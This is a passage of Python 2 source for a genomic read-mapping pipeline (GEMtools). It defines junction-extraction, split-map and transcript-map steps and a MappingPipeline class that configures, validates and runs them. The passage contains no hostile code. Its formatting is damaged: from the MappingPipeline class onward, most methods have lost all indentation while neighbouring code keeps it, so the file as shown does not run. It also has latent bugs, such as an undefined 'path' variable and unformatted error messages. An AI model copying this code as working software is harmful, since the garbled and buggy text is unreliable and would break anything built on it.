    """Pipeline step that extracts de-novo splice junctions.

    Runs junction extraction on the step input, filters the detected
    junctions by split distance and writes the survivors to a
    ``.junctions`` output file.
    """

    def files(self):
        """Return (and lazily create) the list of output file names."""
        if self._files is None:
            out = self.pipeline.create_file_name(
                self.name, file_suffix="junctions", final=self.final)
            self._files = [out]
            self.junctions_out = out
        return self._files

    def run(self):
        """Detect de-novo junctions, filter by distance and persist them."""
        cfg = self.configuration
        detected = gem.extract_junctions(
            self._input(),
            cfg["index"],
            filter=cfg["filter"],
            splice_consensus=cfg["junctions_consensus"],
            mismatches=cfg["mismatches"],
            threads=self.pipeline.threads,
            strata_after_first=cfg["strata_after_best"],
            coverage=cfg["coverage"],
            min_split=cfg["min_split_length"],
            max_split=cfg["max_split_length"],
            refinement_step_size=cfg["refinement_step_size"],
            min_split_size=cfg["min_split_size"],
            matches_threshold=cfg["matches_threshold"],
            max_junction_matches=cfg["max_junction_matches"],
            annotation=cfg["annotation"],
        )
        logging.gemtools.gt("Found de-novo Junctions %d with coverage >= %s" % (len(detected), str(cfg["coverage"])))
        # keep only junctions whose split distance lies within the configured bounds
        kept = set(gem.junctions.filter_by_distance(detected, cfg["min_split_length"], cfg["max_split_length"]))
        logging.gemtools.gt("de-novo junction passing distance filter (min: %s max: %s): %d (%s removed)" % (str(cfg["min_split_length"]), str(cfg["max_split_length"]),
                            len(kept), (len(detected) - len(kept))))
        gem.junctions.write_junctions(kept, self.junctions_out, cfg["index"])
        return self.junctions_out
class SplitMapStep(PipelineStep):
    """Pipeline step that runs the GEM split mapper on the step input."""

    def run(self):
        """Split-map the input reads and return the resulting mapping.

        Split maps are filtered and post-validated before being written
        to the step's final output.
        """
        cfg = self.configuration
        return gem.splitmapper(
            self._input(),
            cfg["index"],
            output=self._final_output(),
            mismatches=cfg["mismatches"],
            splice_consensus=cfg["junctions_consensus"],
            filter=cfg["filter"],
            refinement_step_size=cfg["refinement_step_size"],
            min_split_size=cfg["min_split_size"],
            matches_threshold=cfg["matches_threshold"],
            strata_after_first=cfg["strata_after_best"],
            mismatch_alphabet=cfg["mismatch_alphabet"],
            quality=self.pipeline.quality,
            trim=cfg["trim"],
            filter_splitmaps=True,
            post_validate=True,
            threads=self.pipeline.threads,
            extra=None)
class TranscriptMapStep(PipelineStep):
    """Transcript Mapping step.

    Maps reads against a transcriptome index, either annotation based or
    de-novo. In de-novo mode, when no index exists yet, prepare() injects
    a transcriptome-creation step into the pipeline and run() picks up
    the generated index and keys from it.
    """
    def prepare(self, id, pipeline, config):
        """Prepare the step; in de-novo mode inject the index-creation step.

        id       -- the id this step would get in the pipeline
        pipeline -- the owning pipeline
        config   -- step configuration (mutated in place)
        """
        PipelineStep.prepare(self, id, pipeline, config)
        if config["denovo"]:
            # denovo transcript mapping
            if config["index"] is None or not os.path.exists(config["index"]):
                # add denovo transript step
                create_step_id = pipeline.create_transcriptome("denovo-index", dependencies=self.dependencies)
                self.dependencies.append(create_step_id)
                self.configuration["create_index"] = create_step_id
                if config["index"] is None:
                    # update the configuration
                    config["index"] = pipeline.steps[create_step_id].index_denovo_out
                    config["keys"] = pipeline.steps[create_step_id].denovo_keys
                # this is ugly but we have to increase the id here as we squeezed in another job
                self.id = create_step_id + 1
    def run(self):
        """Map against the transcriptome and keep only split maps."""
        cfg = self.configuration
        if cfg["denovo"] and cfg["create_index"]:
            # resolve index/keys produced by the injected index-creation step
            step = self.pipeline.steps[cfg["create_index"]]
            cfg["index"] = step.index_denovo_out
            cfg["keys"] = step.denovo_keys
        outfile = self.files()[0]
        mapping = gem.mapper(
            self._input(),
            cfg["index"],
            None,  # None as we pipe through the filter
            mismatches=cfg["mismatches"],
            quality_threshold=cfg["quality_threshold"],
            max_decoded_matches=cfg["max_decoded_matches"],
            min_decoded_strata=cfg["min_decoded_strata"],
            min_matched_bases=cfg["min_matched_bases"],
            max_big_indel_length=cfg["max_big_indel_length"],
            max_edit_distance=cfg["max_edit_distance"],
            mismatch_alphabet=cfg["mismatch_alphabet"],
            delta=cfg["strata_after_best"],
            trim=cfg["trim"],
            key_file=cfg["keys"],
            quality=self.pipeline.quality,
            threads=self.pipeline.threads
        )
        # filter for only split maps
        # NOTE(review): unlike other steps, run() returns nothing --
        # presumably callers use files() to locate the output; confirm.
        gem.filter.only_split_maps(mapping,
                                   outfile,
                                   threads=self.pipeline.threads,
                                   compress=self._compress())
    def _input(self, raw=False):
        """Return pipeline input if this step
        has no dependencies or the
        output of the last dependency.

        In de-novo mode the single dependency may be the injected
        index-creation step, whose output is not mappable input, so the
        raw pipeline input is used instead.
        """
        if self.configuration["denovo"]:
            if self.dependencies is None or len(self.dependencies) == 1:
                return self.pipeline.open_input()
            return self.pipeline.open_step(self.dependencies[0], raw=raw)
        else:
            return PipelineStep._input(self, raw=raw)
class MappingPipeline(object):
"""General mapping pipeline class."""
    def __init__(self, args=None):
        """Create a pipeline with default parameters.

        args -- optional parsed-arguments namespace; when given, a saved
                configuration is loaded first (if args.load_configuration
                is set), then the defaults below are overridden by the
                argument values and initialize() validates the setup.
        """
        self.steps = []  # pipeline steps
        self.run_steps = []  # steps to run
        # general parameter
        self.input = None  # input files
        self.name = None  # target name
        self.index = None  # genome index
        self.output_dir = None  # Output directory
        self.annotation = None  # GTF annotation to use
        self.threads = 1  # number of threads
        self.max_read_length = 0  # max read length
        self.transcript_index = None  # transcriptome index
        self.transcript_keys = None  # transcriptome keys file
        self.denovo_index = None  # the denovo index to use
        self.denovo_keys = None  # the denovo keys to use
        self.quality = None  # quality offset
        self.junctions_file = None  # file with both denovo and GTF junctions
        self.junctions_annotation = None  # file with the annotation junctions
        self.scoring_scheme = "+U,+u,-s,-t,+1,-i,-a"  # scoring scheme
        self.compress = True  # compress final output
        self.compress_all = False  # also compress intermediate output
        self.remove_temp = True  # remove temporary files
        self.bam_mapq = 0  # filter bam content mapq
        self.bam_create = True  # create bam
        self.bam_sort = True  # sort bam
        self.bam_index = True  # index bam
        self.sam_no_seq_header = False  # exclude sequence header lines from SAM output
        self.sam_compact = False  # sam compact format
        self.calc_xs = True  # calculate the XS field (original comment was a copy-paste error)
        self.single_end = False  # single end alignments
        self.write_config = None  # write configuration
        self.dry = False  # only dry run
        self.sort_memory = "768M"  # samtools sort memory
        self.direct_input = False  # if true, skip the preparation step
        self.force = False  # force computation of all steps
        self.filter_max_matches = 25
        self.filter_min_strata = 1
        self.filter_max_strata = 2
        self.filter = None  # composed (min, delta, max-matches) tuple, set in initialize()
        # genome mapping parameter
        self.genome_mismatches = 0.06
        self.genome_quality_threshold = 26
        self.genome_max_decoded_matches = 25
        self.genome_min_decoded_strata = 1
        self.genome_min_matched_bases = 0.80
        self.genome_max_big_indel_length = 15
        self.genome_max_edit_distance = 0.20
        self.genome_mismatch_alphabet = "ACGT"
        self.genome_strata_after_best = 1
        # transcript mapping parameter (None values are filled from the
        # corresponding genome parameter in initialize())
        self.transcript_mismatches = None  # initialize from genome
        self.transcript_quality_threshold = None  # initialize from genome
        self.transcript_max_decoded_matches = 150  # this need to be custom
        self.transcript_min_decoded_strata = None  # initialize from genome
        self.transcript_min_matched_bases = None  # initialize from genome
        self.transcript_max_big_indel_length = None  # initialize from genome
        self.transcript_max_edit_distance = None  # initialize from genome
        self.transcript_mismatch_alphabet = None  # initialize from genome
        self.transcript_strata_after_best = None  # initialize from genome
        # junction detection parameter
        self.junction_mismatches = 0.04
        self.junctions_max_junction_matches = 5
        self.junctions_min_intron_size = 4
        self.junctions_max_intron_size = 500000
        self.junctions_refinement_step_size = 2
        self.junctions_min_split_size = 15
        self.junctions_matches_threshold = 75
        self.junctions_coverage = 2
        self.junctions_filtering = "ordered,non-zero-distance"
        self.junctions_consensus = gem.extended_splice_consensus
        self.junctions_strata_after_best = 0
        # pair alignment parameter
        self.pairing_quality_threshold = None  # initialize from genome
        self.pairing_max_decoded_matches = 25
        self.pairing_min_decoded_strata = 1
        self.pairing_min_insert_size = 0
        self.pairing_max_insert_size = None  # initialize from junctions_max_intron_size
        self.pairing_max_edit_distance = 0.30
        self.pairing_min_matched_bases = 0.80
        self.pairing_max_extendable_matches = 0
        self.pairing_max_matches_per_extension = 0
        # stats parameter
        self.stats_create = True
        self.stats_json = True
        # filtering parameter
        self.filtered_create = True
        self.filter_annotation = True
        self.filter_intron_length = 20
        self.filter_block_length = 5
        self.filter_level = 0
        self.filter_max_multi_maps = 5
        self.filter_keep_unique = True
        self.filter_max_error_events = 0
        # gtf stats and counts
        self.counts_create = True
        self.counts_weighted = True
        self.counts_multimaps = True
        self.counts_exon_threshold = 1.0
        if args is not None:
            # initialize from arguments
            # load configuration
            try:
                if args.load_configuration is not None:
                    self.load(args.load_configuration)
            except AttributeError:
                # namespace has no load_configuration attribute
                pass
            ## update parameter
            self.update(vars(args))
            ## initialize pipeline and check values
            self.initialize()
def update(self, configuration):
"""Update configuration from given map
configuration -- the input configuration
"""
for k, v in configuration.items():
try:
if v is not None:
setattr(self, k, v)
except AttributeError:
pass
def __update_dict(self, target, source):
if source is None:
return
for k, v in source.items():
#if v is not None:
target[k] = v
def map(self, name, configuration=None, dependencies=None, final=False, description=""):
"""Add mapping step"""
step = MapStep(name, final=final, dependencies=dependencies, description=description, file_suffix="map")
config = dotdict()
config.index = self.index
config.mismatches = self.genome_mismatches
config.quality_threshold = self.genome_quality_threshold
config.max_decoded_matches = self.genome_max_decoded_matches
config.min_decoded_strata = self.genome_min_decoded_strata
config.min_matched_bases = self.genome_min_matched_bases
config.max_big_indel_length = self.genome_max_big_indel_length
config.max_edit_distance = self.genome_max_edit_distance
config.mismatch_alphabet = self.genome_mismatch_alphabet
config.strata_after_best = self.genome_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def splitmap(self, name, configuration=None, dependencies=None, final=False, description=""):
"""Add split-mapping step"""
step = SplitMapStep(name, final=final, dependencies=dependencies, description=description, file_suffix="map")
config = dotdict()
config.index = self.index
config.mismatches = self.junction_mismatches
config.junctions_consensus = self.junctions_consensus
config.filter = self.junctions_filtering
config.refinement_step_size = self.junctions_refinement_step_size
config.min_split_size = self.junctions_min_split_size
config.matches_threshold = self.junctions_matches_threshold
config.strata_after_best = self.junctions_strata_after_best
config.mismatch_alphabet = self.genome_mismatch_alphabet
config.max_edit_distance = self.genome_max_edit_distance
config.mismatch_alphabet = self.genome_mismatch_alphabet
config.strata_after_best = self.genome_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def pair(self, name, configuration=None, dependencies=None, final=False, description=""):
"""Add mapping step"""
step = PairalignStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.index = self.index
config.quality_threshold = self.pairing_quality_threshold
config.max_decoded_matches = self.pairing_max_decoded_matches
config.min_decoded_strata = self.pairing_min_decoded_strata
config.min_insert_size = self.pairing_min_insert_size
config.max_insert_size = self.pairing_max_insert_size
config.max_edit_distance = self.pairing_max_edit_distance
config.min_matched_bases = self.pairing_min_matched_bases
config.max_extendable_matches = self.pairing_max_extendable_matches
config.max_matches_per_extension = self.pairing_max_matches_per_extension
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def transcripts_annotation(self, name=None, configuration=None, dependencies=None, final=False, description=""):
"""Create annotation based transcriptom and map"""
if self.annotation is None:
logging.gemtools.info("No annotation specified, skipping annotation mapping")
return -1
step = TranscriptMapStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.denovo = False
config.annotation = self.annotation
config.index = self.transcript_index
config.keys = self.transcript_keys
config.mismatches = self.transcript_mismatches
config.quality_threshold = self.transcript_quality_threshold
config.max_decoded_matches = self.transcript_max_decoded_matches
config.min_decoded_strata = self.transcript_min_decoded_strata
config.min_matched_bases = self.transcript_min_matched_bases
config.max_big_indel_length = self.transcript_max_big_indel_length
config.max_edit_distance = self.transcript_max_edit_distance
config.mismatch_alphabet = self.transcript_mismatch_alphabet
config.strata_after_best = self.transcript_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def transcripts_denovo(self, name=None, configuration=None, dependencies=None, final=False, description=""):
"""Create annotation based transcriptom and map"""
step = TranscriptMapStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.denovo = True
config.index = self.denovo_index
config.keys = self.denovo_keys
config.mismatches = self.transcript_mismatches
config.quality_threshold = self.transcript_quality_threshold
config.max_decoded_matches = self.transcript_max_decoded_matches
config.min_decoded_strata = self.transcript_min_decoded_strata
config.min_matched_bases = self.transcript_min_matched_bases
config.max_big_indel_length = self.transcript_max_big_indel_length
config.max_edit_distance = self.transcript_max_edit_distance
config.mismatch_alphabet = self.transcript_mismatch_alphabet
config.strata_after_best = self.transcript_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def create_transcriptome(self, name, configuration=None, dependencies=None, final=False, description="Create denovo transcript index"):
step = CreateDenovoTranscriptomeStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
config.index = self.index
config.filter = self.junctions_filtering
config.junctions_consensus = self.junctions_consensus
config.mismatches = self.junction_mismatches
config.max_junction_matches = self.junctions_max_junction_matches
config.min_split_length = self.junctions_min_intron_size
config.max_split_length = self.junctions_max_intron_size
config.strata_after_best = self.junctions_strata_after_best
config.refinement_step_size = self.junctions_refinement_step_size
config.min_split_size = self.junctions_min_split_size
config.matches_threshold = self.junctions_matches_threshold
config.coverage = self.junctions_coverage
config.annotation = self.annotation
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def extract_junctions(self, name, configuration=None, dependencies=None, final=False, description="Extract de-novo junctions"):
step = ExtractJunctionsStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
config.index = self.index
config.annotation = self.annotation
config.filter = self.junctions_filtering
config.junctions_consensus = self.junctions_consensus
config.mismatches = self.junction_mismatches
config.max_junction_matches = self.junctions_max_junction_matches
config.min_split_length = self.junctions_min_intron_size
config.max_split_length = self.junctions_max_intron_size
config.strata_after_best = self.junctions_strata_after_best
config.refinement_step_size = self.junctions_refinement_step_size
config.min_split_size = self.junctions_min_split_size
config.matches_threshold = self.junctions_matches_threshold
config.coverage = self.junctions_coverage
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def create_stats(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Create stats"):
step = CreateStatsStep(name, dependencies=dependencies, final=final, description=description, name_suffix=suffix)
config = dotdict()
config.stats_json = self.stats_json
config.paired = not self.single_end
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def create_gtfcounts(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Create GTF gene counts and stats"):
step = CreateGtfStatsStep(name, dependencies=dependencies, final=final, description=description, name_suffix=suffix)
config = dotdict()
config.counts_weighted = self.counts_weighted
config.counts_multimaps = self.counts_multimaps
config.counts_exon_threshold = self.counts_exon_threshold
config.annotation = self.annotation
config.paired = not self.single_end
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def bam(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Create BAM file"):
step = CreateBamStep(name, dependencies=dependencies, final=final, description=description,
file_suffix="bam", name_suffix=suffix)
config = dotdict()
config.index = self.index
config.mapq = self.bam_mapq
config.calc_xs = self.calc_xs
config.sort = self.bam_sort
config.consensus = self.junctions_consensus
config.sam_no_seq_header = self.sam_no_seq_header
config.sam_compact = self.sam_compact
config.paired = not self.single_end
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def prepare_input(self, name, configuration=None, dependencies=None, final=False, description="Prepare input"):
step = PrepareInputStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
if configuration is not None:
self.__update_dict(config, configuration)
config.paired = not self.single_end
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def index_bam(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Index BAM file"):
step = IndexBamStep(name, dependencies=dependencies, final=final, description=description, name_suffix=suffix, file_suffix="bam.bai")
config = dotdict()
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def filtered_map(self, name, configuration=None, dependencies=None, final=False, description="Create filtered .map"):
step = FilterStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
config.annotation = self.annotation
config.min_intron = self.filter_intron_length
config.min_block = self.filter_block_length
config.level = self.filter_level
config.max_multi_maps = self.filter_max_multi_maps
config.gene_pairing = self.filter_annotation
config.junction_filter = self.filter_annotation
config.filter_annotation = self.filter_annotation
config.max_strata = self.filter_max_error_events
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def merge(self, name, configuration=None, dependencies=None, final=False, description="Merge alignments"):
step = MergeStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.same_content = True
config.index = self.index
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def merge_and_pair(self, name, configuration=None, dependencies=None, final=False, description="Merge and Pair alignments"):
step = MergeAndPairStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.same_content = True
config.index = self.index
config.quality_threshold = self.pairing_quality_threshold
config.max_decoded_matches = self.pairing_max_decoded_matches
config.min_decoded_strata = self.pairing_min_decoded_strata
config.min_insert_size = self.pairing_min_insert_size
config.max_insert_size = self.pairing_max_insert_size
config.max_edit_distance = self.pairing_max_edit_distance
config.min_matched_bases = self.pairing_min_matched_bases
config.max_extendable_matches = self.pairing_max_extendable_matches
config.max_matches_per_extension = self.pairing_max_matches_per_extension
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def open_input(self):
"""Open the original input files"""
if len(self.input) == 1:
return gem.files.open(self.input[0])
else:
return gem.filter.interleave([gem.files.open(f) for f in self.input], threads=max(1, self.threads / 2))
def open_step(self, id, raw=False):
"""Open the original input files"""
return self.steps[id].open(raw=raw)
def initialize(self, silent=False):
# check general parameter
errors = []
if self.input is None:
errors.append("No input file specified")
else:
if len(self.input) == 1 and not self.single_end:
# search for second file
(n, p) = gem.utils.find_pair(self.input[0])
if p is None:
#errors.append("Unable to deduce second pair input file from %s " % self.input[0])
logging.gemtools.warning("No second input file specified, assuming interleaved paird end reads!")
else:
logging.gemtools.warning("Second pair input file found: %s " % p)
if self.name is None:
self.name = n
self.input.append(p)
# check file counts
if self.single_end and len(self.input) != 1:
errors.append("Specify exactly one input file in single end mode")
elif not self.single_end and len(self.input) > 2:
errors.append("Paired end mode takes up to 2 input files, you specified %d" % (len(self.input)))
else:
# check input files
input_abs = []
for f in self.input:
if f is None or not os.path.exists(f):
errors.append("Input file not found: %s" % (f))
else:
# make aboslute path
input_abs.append(os.path.abspath(f))
self.input = input_abs
if self.name is None and self.input is not None and len(self.input) > 0:
# get name from input files
name = os.path.basename(self.input[0])
if name.endswith(".gz"):
name = name[:-3]
idx = name.rfind(".")
if idx > 0:
self.name = name[:idx]
if self.name is None or len(self.name) == 0:
errors.append("No name specified and unable to guess one. Please use --name to set a name explicitly.")
if self.index is None:
errors.append("No index specified")
else:
if not os.path.exists(self.index):
errors.append("Index not found: %s" % (self.index))
else:
self.index = os.path.abspath(self.index)
if self.quality is None:
errors.append("You have to specify a quality offset (33, 64, or 'ignore' to disable)")
elif str(self.quality) not in ["33", "64", "ignore", "offset-33", "offset-64"]:
errors.append("Unknown quality offset: %s, please use 33, 64 or ignore" % (str(self.quality)))
if self.output_dir is None:
self.output_dir = os.getcwd()
self.output_dir = os.path.abspath(self.output_dir)
if self.annotation is not None:
if not os.path.exists(self.annotation):
errors.append("Annotaiton not found : %s" % self.annotation)
else:
self.annotation = os.path.abspath(self.annotation)
if self.threads <= 0:
self.threads = 1
if self.transcript_index is None and self.annotation is not None:
# guess the transcript index
self.transcript_index = self.annotation + ".gem"
transcript_index_found = os.path.exists(self.transcript_index)
if not transcript_index_found:
self.transcript_index = self.annotation + ".junctions.gem"
transcript_index_found = os.path.exists(self.transcript_index)
if not transcript_index_found:
errors.append("Deduced transcript index not found: %s" % (self.transcript_index))
errors.append("""We look for the transcriptome index just next to your annotation, but
could not find it there. Try to specify a path to the transcriptome index using
[-r|--transcript-index] <index>, where index is the path to the transcriptome
index generated from your annotation.""")
else:
self.transcript_index = os.path.abspath(self.transcript_index)
elif self.annotation is not None and not os.path.exists(self.transcript_index):
errors.append("Transcript index not found : %s")
elif self.transcript_index is not None and os.path.exists(self.transcript_index):
self.transcript_index = os.path.abspath(self.transcript_index)
if self.transcript_keys is None and self.transcript_index is not None:
self.transcript_keys = self.transcript_index[:-4] + ".junctions.keys"
transcript_keys_found = os.path.exists(self.transcript_keys)
if not transcript_keys_found:
self.transcript_keys = self.transcript_index[:-14] + ".keys"
transcript_keys_found = os.path.exists(self.transcript_keys)
if not transcript_keys_found:
self.transcript_keys = self.transcript_index[:-4] + ".keys"
transcript_keys_found = os.path.exists(self.transcript_keys)
if not transcript_keys_found:
errors.append("Deduced transcript keys not found: %s" % (self.transcript_keys))
else:
self.transcript_keys = os.path.abspath(self.transcript_keys)
elif self.transcript_keys is not None and not os.path.exists(self.transcript_keys):
errors.append("Transcript keys not found : %s")
elif self.transcript_keys is not None and os.path.exists(self.transcript_keys):
self.transcript_keys = os.path.abspath(self.transcript_keys)
# check inpuf compression
if self.compress_all and not self.direct_input:
logging.gemtools.warning("Enabeling direct input for compressed temporay files")
self.direct_input = True
# annotaiton junctons should be generated if not found
#self.junctions_annotation = None # file with the annotation junctions
# todo : can we check for a valid scoring scheme ?
#self.scoring_scheme = "+U,+u,-s,-t,+1,-i,-a" # scoring scheme
if self.filter_min_strata >= self.filter_max_strata:
errors.append("Invalid filtering configuration, min-strata >= max-strata!")
else:
if self.filter_max_matches <= 0:
errors.append("Invalid filtering configuration, max-matches <= 0!")
else:
# compose filter
self.filter = (self.filter_min_strata, (self.filter_max_strata - self.filter_min_strata), self.filter_max_matches)
if self.bam_mapq > 254:
errors.append("Invalid mapq filter: %s" % (self.bam_mapq))
# transcript mapping parameter
if self.transcript_mismatches is None:
self.transcript_mismatches = self.genome_mismatches
if self.transcript_quality_threshold is None:
self.transcript_quality_threshold = self.genome_quality_threshold
self.transcript_min_decoded_strata = self.genome_min_decoded_strata
self.transcript_min_matched_bases = self.genome_min_matched_bases
self.transcript_max_big_indel_length = self.genome_max_big_indel_length
self.transcript_max_edit_distance = self.genome_max_edit_distance
if self.transcript_mismatch_alphabet is None:
self.transcript_mismatch_alphabet = self.genome_mismatch_alphabet
if self.transcript_strata_after_best is None:
self.transcript_strata_after_best = self.genome_strata_after_best
# pair alignment parameter
if self.pairing_quality_threshold is None:
self.pairing_quality_threshold = self.genome_quality_threshold
if self.pairing_max_insert_size is None:
self.pairing_max_insert_size = self.junctions_max_intron_size
if not self.single_end and len(errors) == 0:
# check pairing information
p1 = None
p2 = None
c = 0
inp = self.open_input()
for template in inp:
if template.num_alignments == 2:
## paired alignment
p1 = 1
p2 = 2
inp.close()
break
else:
if c == 0:
p1 = template.get_pair()
elif c == 1:
p2 = template.get_pair()
c += 1
if c >= 2:
inp.close()
break
inp.close()
if p1 == 0 or p2 == 0 or (p1 == 1 and p2 != 2) or (p2 == 1 and p1 != 2):
errors.append("""Unable to get pairing information from input.
Please check your read id's and make sure its either in casava >= 1.8 format or the
ids end with /1 and /2""")
if not silent and len(errors) > 0 and self.write_config is None:
raise PipelineError("Failed to initialize neccessary parameters:\n\n%s" % ("\n".join(errors)))
if self.write_config is not None:
# log configuration errors
logging.gemtools.warning("---------------------------------------------")
logging.gemtools.warning("Writing configuration")
logging.gemtools.warning("")
logging.gemtools.warning("Note that some of the parameters are missing:\n")
for e in errors:
logging.gemtools.warning("\t" + str(e))
logging.gemtools.warning("---------------------------------------------")
    def log_parameter(self):
        """Print selected parameters"""
        printer = logging.gemtools.gt
        # true when only an explicit subset of steps will be executed
        run_step = len(self.run_steps) > 0
        printer("------------ Input Parameter ------------")
        printer("Input File(s) : %s", self.input)
        printer("Index : %s", self.index)
        printer("Annotation : %s", self.annotation)
        printer("Transcript Index : %s", self.transcript_index)
        printer("Max read length : %s", self.max_read_length)
        printer("")
        printer("Compress output : %s", self.compress)
        printer("Compress all : %s", self.compress_all)
        printer("Create BAM : %s", self.bam_create)
        printer("SAM/BAM compact : %s", self.sam_compact)
        printer("Calculate XS : %s", self.calc_xs)
        printer("Sort BAM : %s", self.bam_sort)
        printer("Index BAM : %s", self.bam_index)
        printer("Keep Temporary : %s", not self.remove_temp)
        printer("")
        if not run_step:
            printer("------------ Pipeline Steps ------------")
            for i, s in enumerate(self.steps):
                printer("%-2d - %20s : %s", i, s.name, s.description)
        else:
            printer("------------ Single Step execution ------------")
        # detailed per-step configuration (restricted to run_steps when set)
        for i, s in enumerate(self.steps):
            if run_step and s.id not in self.run_steps:
                continue
            printer("")
            if len(s.dependencies) > 0:
                printer("------------ [ID:{0:-3} -- '{1}'] [Depends On: {2}] ------------".format(i, s.name, ", ".join([self.steps[j].name for j in s.dependencies])))
            else:
                printer("------------ [ID:{0:-3} -- '{1}'] ------------".format(i, s.name))
            for k, v in s.configuration.items():
                printer("%25s : %s", k, str(v))
            for i, f in enumerate(s.files()):
                # NOTE(review): this inner loop shadows the outer index ``i``
                if i == 0:
                    printer("%25s : %s", "Temporary Outputs", not s.final)
                    printer("%25s : %s", "Outputs", f)
                else:
                    printer("%25s : %s", "", f)
            printer("--------------------------------------------------------------")
        printer("")
def load(self, file):
"""Load pipeline configuration from file"""
if file is None or not os.path.exists(file):
raise PipelineError("Configuration file not found: %s" % file)
fd = open(file, "r")
logging.gemtools.info("Loading configuraiton from %s", file)
data = json.load(fd)
for k, v in data.items():
if hasattr(self, k):
setattr(self, k, v)
fd.close()
def write_pipeline(self, file_name):
"""Write the pipeline and its configuration to a file
based on the name
"""
json_container = dict(self.__dict__)
# skip the steps here, we convert them manually
del json_container["steps"]
del json_container["run_steps"]
del json_container["write_config"]
# remove non default values
default_pipeline = MappingPipeline()
default_pipeline.initialize(silent=True)
for k, v in json_container.items():
if hasattr(default_pipeline, k) and getattr(default_pipeline, k) == v:
del json_container[k]
# json_container['piepline_steps'] = json_steps
fd = open(file_name, "w")
json.dump(json_container, fd, indent=2, sort_keys=True)
fd.close()
logging.gemtools.gt("Configuration saved to %s\n", file_name)
def run(self):
run_step = len(self.run_steps) > 0
if self.write_config is not None:
self.write_pipeline(self.write_config)
return
if self.dry:
# check and print states
print "Checking Job states"
print "-----------------------------------------------------"
for step in self.steps:
print "Step %3s:%25s :: %s" % (str(step.id), step.name,
"Done" if step.is_done() else "Compute")
return
error = False
all_done = True
final_files = []
# check final steps if we are not running a set of steps
if not run_step and not self.force:
for step in self.steps:
if step.final:
final_files.extend(step.files())
all_done = all_done & step.is_done()
if all_done:
logging.gemtools.warning("The following files already exist. Nothing to be run!\n\n%s\n" % ("\n".join(final_files)))
return
time = Timer()
times = {}
if run_step:
# sort by id
self.run_steps.sort()
ids = [s.id for s in self.steps]
if run_step:
ids = self.run_steps
step = None
# register signal handler to catch
# interruptions and perform cleanup
# register cleanup signal handler
def cleanup_in_signal(signal, frame):
logging.gemtools.warning("Job step canceled, forcing cleanup!")
step.cleanup(force=True)
signal.signal(signal.SIGINT, cleanup_in_signal)
signal.signal(signal.SIGQUIT, cleanup_in_signal)
signal.signal(signal.SIGHUP, cleanup_in_signal)
signal.signal(signal.SIGTERM, cleanup_in_signal)
for step_id in ids:
step = self.steps[step_id]
if run_step:
# check dependencies are done
for d in step.dependencies:
if not self.steps[d].is_done():
logging.gemtools.error("Step dependency is not completed : %s", self.steps[d].name)
error = True
break
if run_step or self.force or not step.is_done():
logging.gemtools.gt("Running step: %s" % step.name)
t = Timer()
if not os.path.exists(self.output_dir):
# make sure we create the ouput folder
logging.gemtools.warn("Creating output folder %s", self.output_dir)
try:
os.makedirs(self.output_dir)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
logging.gemtools.error("unable to create output folder %s", self.output_dir)
error = True
break
try:
step.run()
except KeyboardInterrupt:
logging.gemtools.warning("Job step canceled, forcing cleanup!")
error = True
step.cleanup(force=True)
break
except PipelineError, e:
logging.gemtools.error("Error while executing step %s : %s" % (step.name, str(e)))
logging.gemtools.warning("Cleaning up after failed step : %s", step.name)
step.cleanup(force=True)
error = True
break
except gem.utils.ProcessError, e:
logging.gemtools.error("Error while executing step %s : %s" % (step.name, str(e)))
logging.gemtools.warning("Cleaning up after failed step : %s", step.name)
step.cleanup(force=True)
error = True
break
except Exception, e:
traceback.print_exc()
logging.gemtools.error("Error while executing step %s : %s" % (step.name, str(e)))
logging.gemtools.warning("Cleaning up after failed step : %s", step.name)
step.cleanup(force=True)
error = True
break
finally:
t.stop(step.name + " completed in %s", loglevel=None)
times[step.id] = t.end
if not error:
logging.gemtools.gt("Step %s finished in : %s", step.name, t.end)
else:
logging.gemtools.gt("Step %s failed after : %s", step.name, t.end)
else:
logging.gemtools.warning("Skipping step %s, output already exists" % (step.name))
# do celanup if not in error state
if not error:
logging.gemtools.debug("Cleanup after run")
